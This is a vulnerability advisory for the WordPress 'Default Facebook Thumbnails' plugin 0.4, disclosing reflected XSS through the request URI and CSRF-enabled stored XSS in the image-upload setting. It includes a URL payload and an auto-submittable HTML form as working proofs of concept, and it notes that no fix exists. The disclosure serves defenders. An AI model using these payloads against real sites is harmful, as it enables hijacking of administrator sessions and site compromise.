WordPress Default Facebook Thumbnails plugin version 0.4 suffers from cross site request forgery and cross site scripting vulnerabilities.
c1e875c1252c9663ebb3031bd1c389cd7aaa30b045abfe7fd06e8edc139074ee
Title: WordPress 'Default Facebook Thumbnails' Plugin
Version: 0.4
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej
Date: 2015-06-13
Download:
- https://wordpress.org/plugins/default-facebook-thumbnail/
- https://plugins.svn.wordpress.org/default-facebook-thumbnail/
Notified WordPress: 2015-06-21
==========================================================
## Plugin description
==========================================================
This plugin adds a og:image tag to your head with the input/upload of the image in the settings.
## XSS/CSRF Vulnerabilities
==========================================================
The request URI is echo'ed into the HTML page without sanitization. This can be exploited with a direct link to the vulnerable file (keep in mind that most modern browsers encode the url).
PoC:
[URL]/wp-content/plugins/default-facebook-thumbnail/fb_thumbnail_admin.php?/"><script>alert(1)</script>
The "Upload Image or URL" field in the admin-settings page is vulnerable to stored XSS. This can be exploited by utilizing a CSRF vulnerability.
PoC:
Log in as admin and submit this form:
<form method="POST" action="http://[URL]/wp-admin/admin.php?page=fb_thumbs">
<text>upload image: </text>
<input type="text" name="upload_image" value=""><script>alert(1)</script>"><br />
<text>fb_thumb_hidden: </text>
<input type="text" name="fb_thumb_hidden" value="Y" readonly><br />
<input type="submit">
</form>
## Solution
==========================================================
No fix available
==========================================================
XSS vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.